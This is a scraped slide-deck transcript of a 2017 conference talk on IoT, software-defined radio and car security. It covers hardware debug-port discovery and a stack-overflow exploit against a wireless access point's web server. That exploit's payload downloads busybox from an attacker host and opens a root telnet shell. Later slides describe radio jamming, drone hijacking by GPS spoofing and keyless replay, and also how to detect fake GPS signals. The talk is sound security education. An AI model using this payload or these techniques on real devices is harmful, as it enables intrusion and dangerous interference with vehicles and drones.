Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Birds of a Feather 2017: 邀請分享 IoT, SDR, and Car Security - Aaron

2017年12月10日 - Birds of a Feather ( 簡稱BoF ),語意上是指鳥類會與相同類型的鳥群一起飛翔,之後衍伸為讓志同道合的人們聚集
https://hitcon-girls.blogspot.tw/2017/12/Birds-of-a-Feather.html

  • Be the first to comment

Birds of a Feather 2017: 邀請分享 IoT, SDR, and Car Security - Aaron

  1. 1. IoT, SDR, and Car Security Aaron Luo
  2. 2. Agenda • How to hacking IoT? – Hardware – Software – Radio Signal – Real Case • Introduce the Car Architecture • Hacking the Car
  3. 3. 3
  4. 4. From Attacker’s View • Physical – Network Switchboard – USB Slug • Radio – Wifi, Bluetooth, ZigBee, Z-wave, AM, FM, GPS, GSM…etc. • Network – Web Server/Client – Firmware Update – Hidden Service Port • Human – Phishing – Default Password
  5. 5. How to hacking? (Before disassemble) • Scanning open services – Nmap • Sniff traffics – Router - tcpdump – Mirror port – Build bridge network – Wifi hotspot – Arp spoofing – SDR • Download the firmware – From website – From firmware update module
  6. 6. Sniff traffics – Router • Software router – pfSense
  7. 7. Sniff traffics – Mirror port • LAN Tap Pro
  8. 8. Sniff traffics – Build bridge network • RaspberryPI • External Ethernet card*1 ifconfig eth0 0.0.0.0 promisc up Ifconfig eth1 0.0.0.0 promisc up Brctl addbr br0 Brctl addif br0 eth0 Brctl addif br0 eth1 Ifconfig br0 up tcpdump -i eth0
  9. 9. Sniff traffics – Arp Spoofing • ettercap • arpspoof+mitmproxy
  10. 10. Sniff traffics - SDR • Software-Defined Radio – Generate any radio protocol if device support that frequency – Writing Modulation / Demodulation program by yourself – Simply inspect the radio spectrum
  11. 11. How to hacking? (After disassemble) • Identify chipsets • Find out the debug port – UART – SWD – JTAG • Dump the flash rom – Bus Pirate • Analysis the signal – Logic Analyzer
  12. 12. Identify chipsets • Remove the glue • Google same type chipsets to compare datasheet
  13. 13. Find out debug port • UART – TX – RX – GND – VCC • SWD – SWDIO – SWCLK – GND – VCC • JTAG – TDI – TDO – GND – VCC
  14. 14. Dump the Rom • Bus Pirate • Dump EEPROM via SPI (reference from http://iotpentest.com/how-to-dump-the-firmware-from-the-router-using-buspirate/)
  15. 15. Analysis the signal • Saleae Logic Analyzer – Just care the GND
  16. 16. A real case
  17. 17. Wireless AP
  18. 18. Disassemble
  19. 19. Find out debug port – part 1 • Special unused 4 port – Guess it’s debug port – welding
  20. 20. Find out debug port – part 2 • Find out the GND
  21. 21. Find out debug port – part 3 • Test ports
  22. 22. Find out debug port – part 4 • Measure the voltage
  23. 23. Find out debug port – part 5 • Analysis the signal with Logic Analyzer – GND-GND
  24. 24. Find out debug port – part 6 • Analysis the signal with Logic Analyzer
  25. 25. Find out debug port – part 7 • Analysis the signal with Logic Analyzer – Calculate the baudrate – 1/0.00001725 ~= 57971 – General baudrate: 300,1200,2400,4800,9600,14400,19200,28800,38400,57600,115200
  26. 26. Find out debug port – part 8 • Analysis the signal with Logic Analyzer – Decode with Async Serial – Baudrate 57600
  27. 27. Find out debug port – part 9 • Analysis the signal with Logic Analyzer – Finally decode the signal
  28. 28. Find out debug port – part 10 • Analysis the signal with Logic Analyzer – Finally we know…
  29. 29. Find out debug port – part 11 • Connect to USBTTL – GND-GND – TXD-RXD – RXD-TXD
  30. 30. Find out debug port – part 12 • Finally we got the Putty shell
  31. 31. Key mapping is wrong? • 0x13 -> v • 0x14 -> ? • 0x15 -> u • 0x16 -> ? • 0x17 -> t • I follow this strange rule to write the decoder char asciitable[] = " !"#$%&'()*+,- ./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~"; for (int i=0;i<sizeof(asciitable)-1;i++) { if (tmpchr == asciitable[i]) { tmpinput[inputpos++] = 0x03+(sizeof(asciitable)-2-i)*2; } }
  32. 32. But Why?
  33. 33. Just because RXD did not weld well Just because RXD did not weld well Just because RXD did not weld well
  34. 34. Pick up the filesystem • tar -zcvf /www/fs.tar.gz /
  35. 35. Find the vulnerability – part 1 • Fuzzing the website – httpClient.request("POST","/login.html","a"*(30000) • /usr/sbin/httpd will crash
  36. 36. Find the vulnerability – part 2 • Upload gdbserver (mips version) for remote debugging – /usr/sbin/httpd; ./gdbserver --attach 0.0.0.0:5555 `pidof httpd`
  37. 37. Find the vulnerability – part 3 • Stack overflow • Finally located the crash function – /usr/sbin/httpd 0x0040D44C • If stack is incorrect it will crash before control the ra(ip) • So need to dump original stack to fix – dump memory stack.bin $sp $sp+26000 • ASLR is enabled – # cat /proc/sys/kernel/randomize_va_space – 1
  38. 38. Find the vulnerability – part 4 • Control the ra (ip) origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00“ s0 = "x41x41x41x41" s1 = "x00x00x54x00" s2 = "x43x43x43x43" s3 = "x44x44x44x44" s4 = "x8Cx8Ex4Fx00" s5 = "x46x46x46x46" s6 = "x60xE2x53x00" s7 = "x04x00x00x00" s8 = "x49x49x49x49" ra = "x78x56x34x12“ • httpClient.request("POST","/login.html","a"*(25262)+origstac k+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra) aaaa..(25262 bytes) Original Stack Variables(48 bytes) Register S0~S8 (36 bytes) Return Address (0x12345678)
  39. 39. Find the vulnerability – part 5 • Bypass the ASLR – 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO and heap are randomized. – Find rop chain on self program
  40. 40. Finally we got the RCE root shell origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x01x00x00x00x00x00x00x00" s0 = "x41x41x41x41" s1 = "x00x00x54x00" s2 = "x43x43x43x43" s3 = "x44x44x44x44" s4 = "x8Cx8Ex4Fx00" s5 = "x46x46x46x46" s6 = "x60xE2x53x00" s7 = "x04x00x00x00" s8 = "x49x49x49x49" ra = "x58x79x40x00" command = "wget -O /tmp/busybox-mipsel http://192.168.11.4:8080/busybox-mipsel && chmod 755 /tmp/busybox-mipsel && cd /tmp && ./busybox-mipsel telnetd -l /bin/sh -p 2323" httpClient.request("POST","/login.html","a"*(25262)+origstack+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra+"a"*32+co mmand,headers) aaaa..(25262 bytes) Original Stack Variables(48 bytes) Register S0~S8 (36 bytes) Return Address (return to system()) aaaa..(32 bytes) CommandLine Ascii String
  41. 41. Let’s play SDR (software defined radio)
  42. 42. What is SDR • Software-Defined Radio – Generate any radio protocol if device support that frequency – Writing Modulation / Demodulation program by yourself – Simply inspect the radio spectrum
  43. 43. SDR Tools • HackRF tools • Gqrx - Display the spectrum waterfall • GNURadio – GUI tool for modulation/demodulation • OpenBTS – open source tool for building GSM Station • Artemis – Identify protocol • Baudline – for analysis the I/Q data
  44. 44. If you have the SDR
  45. 45. Sniffing walkie-talkie conversation DEMO
  46. 46. Jamming the radio signal (like DDOS) DEMO
  47. 47. Sniffing airplane <-> ground station ads-b signal
  48. 48. Sniffing GSM – SMS traffic
  49. 49. Putting some image on spectrum spectrum_painter
  50. 50. The Real Case DJI-Phantom 3 Advanced
  51. 51. Let’s analysis the Drone radio • How to find the frequency? – FCC ID – Inspect by SDR
  52. 52. Radio Signal Analysis P3A use two modulation/demodulation to transfer data with 2.4GHz ISM band
  53. 53. RC to Drone radio spectrum (FHSS) • Control drone direction (up down left right) • Frequency 2.400~2.483GHz, each channel about 1MHz
  54. 54. DSSS - Drone to RC radio spectrum • For drone to remote controller image transmission • Frequency 2.4015~2.4815 GHz • split into 6 channels, each channel is about 10MHz
  55. 55. Finally we found… • Images have no checksum mechanism, so we can jamming the radio frequency to show wrong image to controller
  56. 56. DEMO
  57. 57. Next section: GPS Modules
  58. 58. Live Demo (open your mobile maps)
  59. 59. Which function is associate with GPS? • No-fly zone • Return to home • Follow me • Waypoint
  60. 60. How to spoof the GPS location? • Use the SDR • There have a good open-source GPS simulator in GitHub, called gps-sdr-sim, but it have some limitation, before you want fake a location, should wait for few minutes to generate the I/Q data • So we improve the code, let it can in real-time generate GPS signal and can be controlled with the joystick.
  61. 61. DEMO Control GPS by Joystick
  62. 62. How to Increase the radio range? • Buy some active directional antenna
  63. 63. DEMO Hijacking Drone by Joystick
  64. 64. How to detect the fake GPS signal? • You need a GPS module to debug GPS signals. – U-blox M8N
  65. 65. How to detect the fake GPS signal? • Validate the time between satellite time and real time
  66. 66. How to detect the fake GPS signal? • Check the motion speed between point to point – For example it is impossible to change your location from Taiwan to Serbia in one second
  67. 67. How to detect the fake GPS signal? • Validate the GPS sub-frame data
  68. 68. Develop the fake GPS detector • Board: RaspberryPI • GPS modules: u-blox
  69. 69. DEMO Catch The Bad Guys
  70. 70. Car Security
  71. 71. Car Architecture (Reference from: http://knoppix.ru/sentinel/130312.html)
  72. 72. CAN-BUS Network (Reference from: http://www.aa1car.com/library/can_systems.htm)
  73. 73. Remote attack vector • Remote keyless • IVI System • Wireless - OBDII dongle
  74. 74. Remote keyless • SDR – Record/Replay – Analysis the protocol – Proxy Tunnel
  75. 75. IVI System • Connected with can-bus • Wifi • Bluetooth • Radio • Web browser
  76. 76. DEMO
  77. 77. Conclusion • IoT threats come from multi-dimensional – In addition to traditional IP network protocols, there are various types of radio protocols • Be careful CAN-BUS network with in-car wireless device • Comprehensive protection strategy is needed
  78. 78. Q&A(aaronluo17@gmail.com)
  79. 79. Thank you

×